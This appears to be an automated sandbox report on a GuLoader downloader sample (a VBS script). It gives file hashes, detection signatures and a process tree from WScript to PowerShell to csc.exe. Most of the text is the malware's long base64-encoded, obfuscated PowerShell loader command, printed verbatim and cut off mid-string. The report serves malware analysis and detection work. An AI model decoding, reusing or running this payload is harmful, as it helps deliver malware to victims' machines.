guloader | ed831551750605c0aabfd50be520871638512bf010aadf824d4a008ae7f1cfcc

General

Target

203538340-133224-sanlccjavap0003-1.vbs
Size

145KB
MD5

706af9b77cf8ac90b47b799c81aac8a4
SHA1

f614bfea2ba1c77001e7e1faeb24d203c7ff20fb
SHA256

ed831551750605c0aabfd50be520871638512bf010aadf824d4a008ae7f1cfcc
SHA512

f494ab50f0de18def671a30e93b870120bc2e17d4cea2b0e5556204efd5f47dc8765f43d1e661fc52711fe72ef7030c7347ebb3f70300aa775b054aad498f36f
SSDEEP

3072:05kfPLKXc+LdvTwYSABN13pP9HPgVpaTqogA5kSe6PZ8qs:hLKXcWlSgD3pP9q8Tqo3ZO

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
956	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	956	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2044 wrote to memory of 956	2044	WScript.exe	26
PID 2044 wrote to memory of 956	2044	WScript.exe	26
PID 2044 wrote to memory of 956	2044	WScript.exe	26
PID 2044 wrote to memory of 956	2044	WScript.exe	26
PID 956 wrote to memory of 1564	956	powershell.exe	28
PID 956 wrote to memory of 1564	956	powershell.exe	28
PID 956 wrote to memory of 1564	956	powershell.exe	28
PID 956 wrote to memory of 1564	956	powershell.exe	28
PID 1564 wrote to memory of 1548	1564	csc.exe	29
PID 1564 wrote to memory of 1548	1564	csc.exe	29
PID 1564 wrote to memory of 1548	1564	csc.exe	29
PID 1564 wrote to memory of 1548	1564	csc.exe	29

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\203538340-133224-sanlccjavap0003-1.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2044
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "JABTAGwAdQB0AHMAawAgAD0AIABAACcADQAKAEMAZQBuAHMAbwBBAEkAbgB0AHIAZQBkAEQAaQBlAG0AYQBkAGQAaQBzAGsAcAAtAGgAZQBhAHYAZQBUAFMAbgB5AGQAZQB5AFQAeQBuAGcAZABwAFMAawB5AGwAZABlAFAAaABhAGMAbwAgAE0AbwByAHQAaQAtAEYAaQBuAGUAcgBUAE8AcABoAG8AdgB5AFAAYQByAHQAaQBwAFMAcABhAGMAcwBlAEsAbgBpAHQAdABEAFMAYwB1AGIAYQBlAGQAaQBkAG4AYwBmAFUAbgBhAHYAZQBpAFAAYQB1AGwAaQBuAEgAaQBzAHQAbwBpAFMAdABpAHYAbgB0AFYAYQBtAHAAZQBpAFQAbQB0AHUAbgBvAEsAbABhAHAAdABuAEEAZAB2AG8AawAgAFMAdABhAGQAcwBAAEEAbgBrAGUAcgAiAAoAVQBuAGYAbwByAHUAUwBwAGkAbABlAHMARwBlAG4AdABsAGkARgBlAGoAZQBzAG4AUwB1AHAAZQByAGcATwB1AHQAcAByACAARQBjAHIAdQBmAFMAQwBoAHkAbABvAHkARgBhAHMAYwBpAHMASQBuAGYAbwByAHQAUwBrAHIAYQBhAGUARQB1AHIAeQBnAG0AQgB1AG4AZABmADsACgBQAG8AbAB5AG0AdQBMAGEAdABlAG4AcwBPAHAAcAByAGUAaQBEAGkAcwBtAG8AbgBMAHMAbgBpAG4AZwBOAG8AbgBlAHMAIABUAGUAcgBtAG8AUwBEAHIAbAB1AGsAeQBDAG8AbABsAGUAcwBLAGwAYQBwAGgAdABkAHIAaQBrAGsAZQBTAGsAaQBiAHMAbQBUAHUAdABvAHIALgBNAGUAcwBuAGUAUgBFAGwAZQBrAHQAdQBGAHIAaQBrAHQAbgBIAGUAaQBsAHkAdABNAGkAeABlAG4AaQBTAGoAbABzAHQAbQBQAHUAcgBwAGwAZQBOAGkAYwBrAGwALgByAGEAYQBkAGcASQBTAG8AYwBpAGEAbgBUAG8AbQBsAGUAdABVAG0AdAB0AGUAZQBLAG8AbgBrAHUAcgBEAGUAdgBpAGwAbwBUAGkAbgB0AG4AcABPAG0AcgBlAHQAUwBzAGkAbABkAGkAZQBiAGUAawBtAHAAcgBTAGUAdgBlAG4AdgBLAGkAcwB3AGEAaQBSAHkAcwB0AGUAYwBCAGUAcwBrAHUAZQBCAGwAbwBvAGQAcwBTAG4AYQByAGUAOwAKAHoAaQBuAGcAYQBwAFAAZQBsAHMAZAB1AHAAaQBhAGMAYQBiAFQAZQByAHIAbwBsAEwAYQBiAG8AcgBpAFcAaABpAHQAZQBjAEkAbQBwAG8AcwAgAE4AbwB1AGcAYQBzAFQAaQBsAGwAYQB0AEYAbwBuAGQAcwBhAEIAdQBzAHQAbAB0AEUAdABoAG4AbwBpAFIAdQBsAGwAZQBjAFIAaQBtAGkAZQAgAEUAcgByAGEAdABjAEkAbgBzAG8AbABsAEMAbwBtAHAAYQBhAEsAYQBwAHIAbwBzAHMAdAByAGkAZABzAFAAcgBvAGQAdQAgAEEAbQBpAGQAdQBWAEsAYQBiAGkAbgBlAEIAbABpAHYAaQBrAEoAYQBrAGsAZQBzAEUAdgBhAG4AZwBlAEYAbwByAGQAYQAxAAoASQBuAGQAcwB0AHsAVABhAGMAaAB5AFsAZgBvAGwAawBlAEQAUABhAHIAYQBzAGwARABlAHIAZQBhAGwAVQBuAHQAcgBhAEkAVAByAG8AZABzAG0AUgBlAGEAcABwAHAAQwBoAGUAbABpAG8AQQBuAHQAaQB0AHIAYgBvAGcAcwB0AHQARQBnAGUAbgBoACgAUwBtAHUAZwBkACIASABqAGcAcgBhAGsAVABlAG0AcABlAGUAQwBhAHIAbgBpAHIASQBzAG8AbgBpAG4ASAB5AHIAZQBrAGUATQB5AGUAbABvAGwATwB2AGUAcgBmADMATQBlAHQAbwBkADIAUABlAG4AaQB0ACIAYQBmAGYAaQBsACkAVQBuAGQAdgBpAF0ARQByAGgAdgBlAHAARwBlAGwAYQB0AHUASwBsAGQAZQBiAGIAUwBjAGgAaQB6AGwAbgBlAHcAbQBhAGkAUwB0AHIAZQBrAGMAUwBsAHUAZwBoACAASwBhAHQAYQBwAHMAUwB1AGIAcgBvAHQAYgBsAGkAbgBkAGEAUgBlAGQAdQBjAHQASwBuAGEAbABsAGkAQgBlAG4AegBpAGMATgBvAG0AZQBuACAARgBhAGwAZAByAGUARwBlAG8AZwBhAHgAUgBlAGUAbgBsAHQAVAB1AGYAYQBzAGUAVAByAGIAYQBhAHIAQQBtAGIAYQBzAG4AUwB0AG8AcgBtACAAQQBuAG8AbgB5AEkARgByAGUAbQBmAG4ATwBuAGMAZQB0AHQAVQBuAG8AcABlAFAAVQBuAHIAaABlAHQASQBnAG4AaQB0AHIAVgBlAHIAYgBlACAATgBvAG4AcABoAEUAQgBpAGwAYQBnAG4AUwBoAG8AcgB0AHUARABlAGMAYQBzAG0AQgB1AGwAawBpAFMAUAByAG8AcABoAHkAVwBpAGMAawBpAHMATQBpAHMAYwByAHQARQB1AGMAaABsAGUAQQBuAGEAbgB0AG0ATwByAGEAbgBnAEwAQQBjAGMAZQBsAG8AQwBhAHIAYQBtAGMAbgBlAHUAcgBpAGEAQwBhAG4AdABhAGwAVQBkAGIAcgB5AGUAUgBlAGcAbgBzAHMAVQByAGkAbgBhAEEAUwBsAGEAZwBlACgARQB0AGgAaQBvAHUAQQBsAHQAbwB1AGkAQgByAGUAcgBuAG4ATQBlAG4AaQBuAHQAYwBvAGwAdQBiACAATwBtAHMAcABuAHYAQgByAHUAZwB0ADEASgBvAGkAcwB0ACwAQwBoAGEAcwBzAGkARABpAHMAcwBvAG4AVABlAHQAcgBhAHQAUwBsAG8AdwBlACAASABvAG4AbwByAHYAbQBhAGIAbwBuADIAUwB1AGEAcwBpACkAQwBvAG4AdABhADsACgBEAHYAcgBnAGIAWwBCAGEAbABsAGUARABCAGUAdgBhAHIAbABMAG8AbABsAGUAbABTAHUAYgBzAGkASQBNAGEAawBrAGUAbQBQAHIAZQBzAHMAcABDAGkAcgByAG8AbwBTAHUAcABlAHIAcgB1AG0AdQBsAGkAdABTAGwAdQB0AG4AKABJAGYAZgBpAG4AIgBJAGIAcgB1AGcAdwBSAGUAZwByAGUAaQBQAHIAZQBhAGwAbgBSAGUAawB0AG8AcwBDAGwAYQB2AGkAcABOAG8AbgB2AGkAbwBvAGIAcwBlAHIAbwBEAHIAYQBnAG8AbABTAHUAbQBwAHMALgB0AGkAYwBrAGwAZABoAGEAbgBlAGYAcgBSAGUAZgB1AHMAdgBJAG4AZABsAGUAIgBNAGkAawByAG8AKQBXAGEAZwBlAGwAXQBGAG8AcgB1AGQAcABNAGkAbABpAGUAdQBBAGYAZgB5AHIAYgBuAG8AbgBpAG4AbABTAHAAcgBpAG4AaQBTAGEAbgBpAHQAYwBLAG4AaQBiAGUAIABMAGIAZQBzAGUAcwBPAHIAZgByAGEAdABBAG4AdgBlAG4AYQBTAGEAYgBiAGEAdABTAGEAcgBrAGwAaQBKAGUAcgBuAHYAYwBoAG8AbQBvAGwAIABVAG4AYwBvAG4AZQBMAHUAZgB0AGwAeABMAGUAZwBhAGwAdABBAG0AaQBhAGIAZQBBAHAAYQBlAHMAcgBoAGUAbABtAGUAbgBTAGsAZABlAHIAIABEAHUAcgBhAHAAaQBBAGwAdABhAG4AbgBkAGEAZgBuAGUAdABPAHoAbwBuAGwAIABDAGEAcwBzAGEARQBGAGEAZwBlAHQAbgBUAGgAbwB1AG4AdQBBAG4AZgBvAGUAbQBKAG8AbAByAGUARgBJAG4AbgBvAGMAbwBUAGEAawBrAGUAcgBIAGEAbAB2AHQAbQBCAGEAcwBnAHUAcwBJAG4AdABlAGwAKABIAHUAagBlAGQAaQBYAHkAbABvAGcAbgBVAGQAcgBqAGUAdABGAG8AcgBtAGkAIABSAGUAcwBwAGwASQBVAG4AZQBuAHQAbgBQAGUAcgBzAG8AZgBDAG8AcwB0AHUAYQBwAHIAZQBpAG4AbgBHAGkAbABkAGUAdABCAGkAZwBmAG8ALABTAHAAaQByAGEAaQBOAGUAZABzAHQAbgBUAGkAbABzAGsAdABmAGUAbAB0AG0AIABFAHQAYQBhAHIAVQBjAG8AdQBuAHQAcgBPAHAAaQB1AG0AdAByAGUAbABsAHkAZQBNAGEAbgBpAGYAeABDAGUAbgB0AHIALABCAGUAbABhAHQAaQBUAHUAcwBjAGEAbgB0AHkAbgBkAHQAdABUAGUAcgBhAHQAIABrAG8AbQBmAHUAUABQAHMAZQB1AGQAcgBJAGQAZQBuAHQAbwBBAGMAYQBkAGUAZwBNAGkAbgBkAGUAcgBNAGEAdQByAGkALABCAHIAcwBuAG8AaQBNAGkAbABpAGUAbgBVAGcAaQBkAGUAdABQAGgAbwB0AG8AIABBAHIAYgBlAGoAQgBkAGEAYwB0AHkAbwBQAHIAZQBnAHUAYwBSAGEAdAB0AGwAaABSAHUAcwB0AGkAdQBTAGEAbgBkAGoAcgBQAG8AcAB1AGwALABBAGUAcgBvAGwAaQBCAGEAawB3AGkAbgBIAGUAbAB0AGUAdABNAG8AZABpAGYAIABTAHAAbwByAHYAQQBIAHUAcgBzAGkAbABQAGEAbABhAGYAdABwAGkAcwBoAGYAZQBrAHUAbABsAGUAcgBTAGUAYwBvAG4AZwBGAG8AcgB0AHIALABOAGEAcgBjAG8AaQBpAGwAZABzAHQAbgBWAGUAZwBlAHQAdABFAHIAawBsAHIAIABGAG8AcgBuAGkAUgBWAGEAbgBkAHkAaQBQAG8AZABpAHQAYgBLAG8AbQBpAHUAcwBUAG8AZgB0AGUAdABSAHYAZQByAGIAbwBPAHAAZgByAGkAKQBVAGQAbABlAGoAOwAKAFUAbgBkAGUAcgBbAFMAdABhAHQAcwBEAFAAYQByAGEAZABsAGIAYQBsAG8AdABsAEQAZQBtAGUAbgBJAEUAeABhAG0AaQBtAEQAbwByAHMAdQBwAEkAcgByAGUAYwBvAEUAbgBjAGgAYQByAHQAbwB3AGwAaQB0AEYAcgBhAHYAaQAoAEEAaQBsAHUAcgAiAEIAdQBjAGgAdQBrAEEAbABpAGcAbgBlAEQAZQBwAGwAbwByAFUAZwByAGUAZABuAFUAZABsAG4AZwBlAE4AbwBuAHAAYQBsAHMAbQBhAGcAcwAzAEQAcgBmAHkAbAAyAFAAcgBlAHMAYgAiAFAAZQBuAG4AYQApAEUAcgByAG8AbgBdAFYAaQBlAHQAbgBwAEsAbwBzAG0AbwB1AEkAbgB0AGUAcgBiAEQAaQBnAGUAcwBsAFIAZQBzAGUAcgBpAEQAZQByAG0AYQBjAFMAbgBlAGIAbwAgAFUAbgBzAGkAbQBzAFYAaQBuAGUAZwB0AEMAbwBuAHQAZQBhAEUAbABlAGMAdAB0AEYAYQBzAGMAaQBpAEIAbABpAGQAbgBjAEcAcgBvAHUAbgAgAHMAdQByAHEAdQBlAFQAcgByAGUAcwB4AFIAZQBrAGEAbAB0AEMAbwBtAG0AZQBlAHAAZQByAGkAYwByAEMAbwByAGQAbABuAHQAcgBpAG0AbwAgAEUAbgByAGUAZABpAEsAcgBvAHAAZABuAFMAbAB1AGcAZQB0AEIAcgBpAG4AdAAgAEsAYQBrAGEAdABHAEgAagBlAHIAdABlAEQAZQBsAG0AbwB0AFMAbgBlAGQAaQBDAEcAYQBuAGcAZQB1AEsAbwBzAHQAdQByAEUAawBzAHAAYQByAEIAYQBzAGUAbQBlAEYAcgB5AGcAdABuAGMAbwB5AHMAaQB0AGsAbABhAHAAcwBUAFUAbgBnAHUAaQBoAE0AeQB0AGUAZAByAG4AYQBhAGwAZQBlAFMAdAB2AGYAcgBhAEsAcgBvAG0AYQBkAFUAbgBkAGUAcgAoAEIAYQBzAGsAZQApAFAAZQBzAHQAaQA7AAoATgBvAG4AYQBkAFsAVABpAGwAYgB5AEQAUwBlAHMAcQB1AGwAVgBlAHIAdABpAGwAVgBlAG4AZQBlAEkAUABpAGMAYQByAG0AUgBhAHQAaQBvAHAAVQBuAGkAdgBlAG8ASQBuAGQAdQBzAHIARwBlAG4AZQByAHQATQBlAG4AaQBuACgATgBpAGQAaQBvACIAVABvAHIAcwBpAGcARABlAGwAdQBzAGQATgBvAHQAaQBvAGkAQgBhAHIAeQB0ADMAUwBuAGUAYwBrADIAQgBvAHIAdAByACIAWQB1AG4AcQB1ACkARgBlAGoAbABtAF0ATwBlAGMAdQBtAHAATAB1AGYAdAB3AHUAUABvAGwAeQBwAGIAUwBhAGcAZgByAGwAaQBuAGQAZABtAGkATQBvAHIAaQBiAGMAUwBhAHQAcwBiACAARgBvAHIAZQBsAHMAUwBoAG8AbwBkAHQATgBlAHUAcgBvAGEARABvAGIAYgBlAHQAVABuAGQAZQBzAGkAcgBlAHYAaQBjAGMAVQBuAG0AZQBuACAAUwBkAHMAdQBwAGUASABlAGwAcwBlAHgAVQBuAG0AaQBzAHQAQgBlAHMAdAB5AGUATgBvAG4AcgBlAHIAUAByAGUAYgBlAG4AVABvAHAAZgBvACAAUABhAHQAZQBuAGkARwByAG8AdgBmAG4ARQBnAGUAbgB2AHQAQQByAG4AZQBzACAATQBpAHMAZAByAEYAVwBhAGwAawBzAGkAUABhAG4AcwBlAGwAUwBhAG4AZwB1AGwATABpAG4AZQB1AFAARABlAGwAcwB0AGEAUABzAGUAdQBkAHQASwBvAG4AdABvAGgAVgBpAGwAaQBwACgATQBpAHMAbwBwAGkAZABpAHMAdQBsAG4AZgByAGUAZQB3AHQARgBpAHMAaABsACAAVABlAHMAdABvAEUAQQBiAHIAdQBzAG0ATQBpAGwAawB5AG0ARQB4AHAAbABvACkAcgBlAGYAdQBzADsACgBLAGEAbABlAG4AWwBSAGkAZwBnAGUARABVAG4AZABlAHIAbABCAHUAawBsAGUAbABTAGwAaQBrAGsASQBsAG8AdgBvAHYAbQBQAHIAZQBwAHIAcABPAHUAdAByAGEAbwBSAG8AdABlAHIAcgBBAHEAdQBhAHIAdABHAGUAbQBpAG4AKABTAHAAeQB0AHMAIgBSAGUAcwB1AGwAawBOAG8AdgBhAGsAZQBBAGwAcABpAG4AcgBVAGQAbgB2AG4AbgBrAGEAZgBmAGUAZQBIAGUAbQBpAHAAbABFAGgAcgBtAGEAMwBHAHIAYQBzAHAAMgBLAG4AZQB2AGUAIgBWAGEAbgB0AGUAKQBCAGoAZQByAGcAXQBKAGUAcwB1AHMAcABBAGcAaQB0AGEAdQBGAGEAbgB0AHkAYgBEAHkAawBhAG4AbABBAGwAYgBhAG4AaQBQAG8AcABsAGkAYwBDAHIAeQBwAHQAIABGAGkAbABzAHQAcwBLAG8AbgBrAHUAdABOAG8AbgBzAGUAYQBTAG4AbwBvAHAAdABCAGUAcwBsAHUAaQBJAG0AbQBhAHIAYwBBAGwAdABhAG4AIABNAGkAYwByAG8AZQBNAGkAbgBpAHMAeABPAHYAZQByAHMAdABTAHUAYgByAG8AZQBBAHAAcABsAGkAcgBVAGQAcwBtAGkAbgBQAHIAZQBsAGwAIABUAGEAdgBsAGUAaQBQAHIAbwBsAG8AbgBBAGYAdABlAG4AdABBAGYAcwBrAGUAIABSAGUAaQBuAGMAVABBAG0AYQB0AHIAbABYAHkAbABvAGcAcwByAGUAbABpAGUAQQByAGUAbABhAGsAbABBAG4AcwBsAGEAbABTAGkAbgBlAGMAbwBhAGYAdABvAHAAYwBEAGkAYQBtAGkAKABIAHkAcwB0AGUAKQBDAGEAYwBvAGcAOwAKAEMAbwBsAG8AcQBbAFAAcgBvAGMAbABEAEEAcgB0AGkAawBsAFQAZQByAG8AcwBsAFAAcgBvAHMAZQBJAEMAZQByAHYAaQBtAFYAaQB0AHIAYQBwAEIAbABuAGQAaQBvAFMAcABhAHIAcgByAHQAZQByAG0AbwB0AEIAaQBjAGgAYQAoAFAAYQB4AG8AbgAiAEQAZQBnAGcAZQB1AEMAaABlAHIAcgBzAFIAZQBkAG8AcwBlAFAAcgBvAGcAcgByAFYAaQB2AGkAZgAzAFUAbgBvAGIAdQAyAEkAbgBkAHYAZQAiAEQAZQBjAGUAbgApAEQAaQBzAHQAcgBdAFAAYQByAG8AZABwAFMAcABlAGsAdAB1AEQAbwB2AGUAbgBiAEkAbgBmAGkAeABsAGsAbwBvAHIAZABpAEYAaQBsAG0AawBjAEEAcABvAHQAZQAgAEQAYQB2AGkAZQBzAEYAZwB0AGUAcwB0AEwAYQBzAHQAZQBhAEQAaQBhAHQAbwB0AE0AdQBsAGEAdABpAFUAZABmAGEAbABjAFMAdQBwAGkAbgAgAFUAawBvAG4AdgBlAHMAeQBzAHQAZQB4AGMAaQByAGMAdQB0AEQAYQB0AGkAZABlAFUAawByAGkAdAByAEgAYQBsAG8AZwBuAE0AYQBjAHIAbwAgAFIAZQBmAHUAZwBpAEYAdQBsAGQAbQBuAGcAcgBvAG8AbQB0AEgAeQBvAHMAYwAgAEYAbwByAHMAaQBCAFMAbgBpAHQAcwBlAFMAdABkAHAAdQBnAEwAaQBjAGUAbgBpAFAAYQBwAGUAcgBuAEkAZABlAG4AdABEAEEAawBrAHUAbQBlAEUAbABpAHQAaQBmAEIAbwBsAGkAZwBlAEMAbwBwAHQAZQByAEEAYgBkAGkAYwBXAEwAYQBuAGcAZQBpAEIAcgBuAGUAaABuAFIAZQBuAHQAZQBkAEMAZQByAGkAbwBvAE8AbQBwAGwAYQB3AGUAbQBvAHQAaQBQAEoAYQBpAG4AaQBvAFAAaQBjAGEAbgBzAFMAawByAG0AeQAoAFUAbgBkAGkAcwBpAEQAcwBlAGQAZQBuAEUAYQByAHQAaAB0AFQAaQBrAHIAbwAgAEIAYQBnAGYAagBBAHMAdQBiAGEAcgB2AEEAZABhAG0AYQBhAGkAbgBkAG8AZQBuAFMAdABhAHAAaAApAFAAcwBlAHUAZAA7AAoAVAB1AHMAaQBuAFsAUwBvAGwAZABhAEQAYQBzAHMAZQBvAGwAVABhAHYAbABlAGwAcwBrAG8AcgBwAEkAcABpAHMAdABhAG0ASABhAHcAYQBpAHAAWQB1AGwAYQByAG8AUABvAHMAdAB1AHIAUAByAG8AdgBlAHQAQQBmAG0AeQBzACgATQBlAHMAbwBwACIAUwB1AHIAaABlAGsAUgBlAGUAbgBkAGUAVQBuAGQAZQByAHIAQwBhAHIAbwB0AG4ASwBsAHUAZAByAGUAVABzAGUAZAByAGwASABlAHQAZQByADMAdgBhAGwAdQB0ADIAUwB0AHYAbABlACIAQwBuAGkAZABvACkAQQBmAGQAaQBzAF0AUwBhAGUAbABsAHAAaAB1AGwAawBpAHUAVgBpAGcAZwBhAGIAQwBvAG0AcABvAGwAUwBlAG0AaQBtAGkAcwB3AGEAbABsAGMAUwBwAGkAZABzACAASAB2AG4AZQBwAHMAUwBsAGUAdABuAHQAQwBvAG4AdgBlAGEATgBlAGcAbABpAHQAUgB1AGIAYgBlAGkARgBvAG4AbwBnAGMAQgBpAGEAbgBjACAASwBsAGEAcwBzAGUARwByAGEAbgBlAHgAVQBmAG8AcgBhAHQAUwBwAGgAYQBnAGUARABhAHQAYQBtAHIATwB2AGUAcgB2AG4ATQBpAGwAZAByACAASgBlAHIAbwBtAGkAVABqAHQAZQBuAG4AUwBsAG8AbwB0AHQARABpAHMAZgByACAARwB5AHAAdABpAFYAawBvAGwAbwBuAGkAVABvAG8AbABzAHIAUABhAGwAZQBzAHQATQBlAG4AdQBuAHUAawBvAHIAcABvAGEASQB0AGUAcgBhAGwAQgBhAHMAaQBsAEEAdQBuAGEAbABsAGwASABlAHIAcwBrAGwASQBwAGEAbABuAG8AZQBuAGQAbwBwAGMAUgBlAGQAdQBjACgARgByAGkAcwBhAGkAUwBlAGwAdgBtAG4AVgBhAHIAZQBnAHQASABpAHMAdABvACAAUgBlAHMAbwByAHYAVQBkAHMAcAB5ADEAUwB1AHAAZQByACwARwBhAHYAbwB0AGkATgBhAHQAaQBvAG4AVgBlAGoAcgBmAHQAQgBhAHIAYgBlACAAQwBoAGwAbwByAHYAVQBuAGMAdQBjADIAZgBvAHIAZQBmACwARABlAGYAaQBiAGkAQQBlAHIAbwBiAG4ATABnAGUAdQByAHQASwByAHkAZAByACAAVQBuAHAAdQByAHYARABlAGsAYQBwADMAUgBhAGQAaQBjACwASQBzAGMAaABpAGkARABlAGwAdQBnAG4ATwBiAGwAaQBnAHQAVQBkAGYAbwByACAAQwBsAGkAbQBhAHYASABlAG0AYQB0ADQAUwB0AGkAawBrACkAQgBlAHIAZQBkADsACgBCAG8AcgBzAGoAWwBwAG8AbAB5AHQARABCAHUAbQBwAGkAbABDAG8AbgBmAGUAbABzAG8AYQBrAGkASQBCAG8AdAByAHkAbQBKAGUAdABvAG4AcABFAHIAaAB2AGUAbwBrAGwAbABpAG4AcgBIAHkAcABlAHIAdABPAG4AYwBvAGwAKABIAGEAcgByAGUAIgBEAGUAZgBpAG4AawBXAG8AbwB6AGkAZQBLAGEAdABhAGwAcgBLAHIAeQBkAHMAbgBOAGEAdABpAG8AZQBTAG0AZQByAHQAbABUAHIAaQBsAGwAMwBVAHQAbQBtAGUAMgBHAGEAbABvAHAAIgBVAG4AZABlAHIAKQBFAGwAZQBrAHQAXQB1AGQAbQBlAGwAcABTAHQAeQByAGsAdQBBAG4AbwByAGQAYgBpAG0AcAByAG8AbABUAGEAZwByAHkAaQBNAGkAYwByAG8AYwBUAHkAcgBhAG4AIABFAHIAaAB2AGUAcwBHAGwAbABlAG8AdABTAHUAYgBsAGEAYQBMAGsAawBlAHIAdABBAGIAcwB0AGUAaQBCAGUAcwB0AHQAYwBCAHIAZQBpAHMAIABTAHQAZQByAGUAZQBNAG8AbgBvAHAAeABTAGEAbABhAG4AdABoAG8AdQByAGYAZQBBAGYAZwByAGEAcgBFAG0AYgBlAGQAbgBFAHIAbwBuAHMAIABUAHkAcgBpAG4AaQBVAG4AZQBwAGkAbgBSAGEAYwBpAGEAdABKAG8AdQByAG4AIABDAGEAdABlAG4AQwBSAGUAbQBhAGcAbwBJAG4AbQBhAHQAcABIAGEAbgBkAGUAeQBEAGEAdABhAHQARgBTAHQAbwByAGEAaQBFAG4AZABhAHMAbABVAG4AcwBhAGMAZQBBAG4AcwB0AGUAKABwAGkAZQByAGMAaQBMAHUAZwB3AG8AbgBSAGUAdgBuAGUAdABHAGkAcgBsAGkAIABwAG8AawBhAGwAVABNAHkAbwBzAGUAaQB1AG4AZABlAHIAbABHAHIAZQBlAG4AbABSAG4AdABnAGUAaQBHAHUAdAB0AGkALABDAGkAcgBjAHUAaQBOAGcAbABlAHYAbgBLAG8AZgBmAGEAdABUAHYAdQBuAGcAIABIAGUAZABlAHMAQwBCAHUAbQBsAGUAeQBDAGUAcABoAGEAYQBQAHIAbwBnAHIAbgB1AG4AcgB1AGwAaABCAHMAbgBpAG4ALABWAGUAbgB0AGUAaQBiAGwAbwBvAGQAbgBTAHQAcgBhAGUAdABMAG8AbQBtAGUAIABQAHIAZQBzAHQASwByAGUAYwBpAGQAYQBjAHIAaQBjAG8AbABEAGUAcgBhAGQAbwB1AG4AYwByAGUAZQBSAHYAZQBrAGEAKQBBAHAAcwBpAGQAOwAKAHIAbwB0AHQAdwB9AAoAUABlAHIAaQBjACIASwBsAGEAbQByAEAACgBUAGkAbAB2AG4AJABDAGkAZwBhAHIAVgBDAGwAaQBuAGUAZQBBAGQAcgBpAGEAawBBAG0AbQBvAG4AcwBEAGUAdABlAGsAZQBIAGwAZQByAGYAMwBTAGEAZwBvAG0APQBIAGEAcwB0AGkAWwBDAHIAdQBuAG8AVgBDAG8AbgB0AHUAZQBDAGUAbgB0AGEAawBBAGwAawBlAG4AcwBUAHIAYQBsAGwAZQBTAHUAcABlAHIAMQBUAHoAYQByAGkAXQBBAGQAdgBlAHIAOgBDAGgAYQBuAGUAOgBMAGEAbgBkAHMAVgBTAGwAdQBtAHAAaQBoAG8AbQBvAHAAcgBIAHkAcABlAHIAdABMAHQAZQBtAGEAdQBBAG4AdABpAG0AYQBNAG8AZABlAG0AbABNAGkAYwByAG8AQQBCAHIAbwBtAGkAbABTAGMAaABvAG8AbABEAGkAbABlAG0AbwBTAHQAagBlAG4AYwBLAG4AeQBlAG4AKABQAGEAbgBjAGwAMABNAGUAcgBsAGkALABIAHUAcwB0AGEAMQBCAGwAbwBkAHQAMABSAGUAZgBvAHIANABlAG4AYgBlAG4AOABzAGEAdABpAHIANQB6AGkAbgBhAGIANwBCAG8AZwBsAGEANgBCAG8AbgBpAHQALABEAGUAcgB1AG4AMQBEAHUAbQBwAGUAMgBVAG4AZAB0AGEAMgBCAHkAYwBlAG4AOABBAG0AYgBhAHMAOABVAGYAbwByAG4ALABDAGgAZQBuAGEANgBTAGkAZwBuAGEANABDAGEAZABlAHIAKQAKAFMAcABhAG4AaQAkAFMAYQBiAG8AdABHAEsAYQB0AGEAcwBhAEQAZQBrAG8AbQBhAE0AbwBkAHMAdgBlAEwAaQBsAHkAYQA9AEMAdQByAHIAaQAoAFIAeQBnAGUAcgBHAHIAZQBrAGwAYQBlAFMAdQBuAG4AaQB0AEYAbAB5AHYAZQAtAFoAbwBzAHQAZQBJAFAAYQByAGEAcQB0AFYAYQBrAHUAdQBlAFMAdQBiAHMAaQBtAFQAcgBpAG4AawBQAEsAbwBiAGIAZQByAG8AbgBlAGkAcgBvAFAAZABvAGYAaQBwAFYAbwBsAHQAZQBlAEEAZABvAHAAdAByAFUAbgBtAGkAbgB0AFAAYQBwAGUAcgB5AFAAcgBlAHMAYwAgAFUAdgBlAGoAcwAtAEIAZQB2AGkAZABQAEUAbgB0AGkAYwBhAEMAbwByAG8AcAB0AFUAbgBkAGUAcgBoAEcAbwBkAHMAawAgAFcAbwByAHQAaAAiAFIAZQBrAHYAaQBIAFEAdQBhAHQAZQBLAEYAYQByAG8AbABDAEIAaQBsAGwAZQBVAFIAZQBkAHUAYwA6AGYAdQBkAHMAdQBcAFIAYQB2AG4AcwBTAFIAYQBuAGMAaABvAHMAdABpAGYAdABmAEwAZQB1AGMAbwB0AEkAcwB0AGgAbQB3AFAAZQByAGkAYwBhAFMAdABlAHIAcwByAE8AcgBsAG8AZwBlAEIAZQB0AG8AbgBcAFQAcgB1AGYAZgBNAFQAcgBhAHAAYgB1AFUAbgBmAHIAaQBuAFMAcAByAG8AYwBpAE8AcgBpAGcAaQB0AFMAYQBrAHIAaQBpAEIAYQBkAGUAYQBvAFAAZQByAHIAdQAiAEsAbwBnAGUAcwApAEEAawBrAG8AcgAuAFIAZQB0AGEAYgBBAEcAdQBuAGQAZQBuAEMAcgB5AG8AYwBmAEQAbwByAG0AaQByAFMAawByAGkAdgBzAHQAcgBpAHYAcwAzAEQAYQBnAGIAZwA0AAoASABhAG0AcwBrACQAZABpAGEAYgBhAFUAUwBlAHgAaQBzAG4ASwBuAG8AcgBvAHMAQwBhAGwAYwBpAHQAUwBqAG8AZgBsAHIAQgBsAHMAZQByAGUATABvAGcAaQBvAHcARABlAGMAZQBtAGUAVwBhAHIAbgBlACAAQgBhAGcAbABhAD0ASgBvAHIAZABzACAAQgBlAHMAdgByAFsAVQBuAGEAZgBmAFMATQBpAGMAcgBvAHkAQwBsAGEAbQBvAHMAVwBlAGQAcwBlAHQAUgByAHQAYQBuAGUAUgBlAGQAaQByAG0AVABpAG0AZQB0AC4AUwBlAHgAZgBpAEMAUABhAHIAYQBnAG8AbgBhAGcAbABlAG4AUwBjAGkAbgB0AHYASABqAGUAcgB0AGUARABrAGEAZAByAHIAQQBmAGcAYQBuAHQARwBlAG4AbgBlAF0AQQBuAHQAaQBzADoARABpAHYAZQBzADoARgBlAG4AYQ